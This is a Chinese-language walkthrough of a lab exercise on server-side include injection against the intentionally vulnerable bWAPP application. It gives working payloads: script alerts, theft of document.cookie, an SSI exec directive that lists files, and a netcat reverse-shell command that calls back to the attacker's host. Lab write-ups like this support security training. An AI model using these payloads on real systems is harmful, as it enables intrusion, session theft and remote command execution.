SSI是用于向HTML页面提供动态内容的Web应用程序上的指令。服务器端包括攻击允许通过在HTML页面中注入脚本或远程执行任意代码来利用Web应用程序。攻击者可以访问敏感信息,如密码文件,并执行shell命令。SSI指令注入到输入字段中,并将它们发送到Web服务器。
欲了解更多信息,请访问owasp.org
使用kali Linux在浏览器中打开目标IP: 192.168.1.103/bWAPP/login.php。输入用户名和密码分别为bee 和 bug 。
设置 安全级别 低,从列表框选择您的错误选择服务器端包括注入现在单击 Hack
现在请求网页会打开,你可以看到它有两个文字字段的名字和姓氏。
然后我使用随机的名字test:test作为对名字和姓氏额尊重,当我点击Lookup选项卡时我将收到什么。这里提到文本容易受到SSI注入的攻击。
当我点击查找,一个新的wep页面弹出在窗口屏幕上,显示了我的Kali Linux 的IP 192.168.1.107。
现在我将尝试通过将不同类型的恶意代码发送到Web应用程序来利用此漏洞。如果您在这里仔细看到以下屏幕截图,我已经发送了一个脚本,将在窗口屏幕中生成一个alert。要执行此操作,您需要修改名字的文本字段并在其中键入以下代码。
<script>alert(“hack”)</script>
所以当我们再次点击查找时,会在窗口屏幕中弹出一个提示“ hack ”。因此,我确认提交的input.text是脆弱的。
如果我愿意获取web服务器的cookie,那么这里也是可以的。只有我们需要在相同的文本文件中键入以下脚本代码。
<script>alert(document.cookie)</script>
现在再次出现一个提醒提示,会弹出服务器的cookie,我们可以使用它来做进一步利用。
使用exec指令,我们可以使用cmd作为参数执行服务器端命令。在这里,我试图使用以下代码检索所有文件和文件夹列表。
<!–#exec cmd=”ls -a” –>
你可以看到由于没有正确配置服务器,我们已经可以看到网站目录中所有文件。
最后终于我们将尝试使用netcat访问其远程shell,这将帮助我们建立与目标系统的反向连接。打开一个终端,启动端口4444上的netcat侦听器,并在上述的漏洞文本中输入以下内容。
<!–#exec cmd=”nc 192.168.1.107 4444 -e /bin/bash” –>
所以当您再次点击Lookup标签时,您将通过netcat shell获得反向连接,可以看到如下截图,这意味着Web应用程序服务器被黑客入侵,我们可以执行以下命令来渗透越来越多。
ID
pwd
*参考来源:hackingarticles,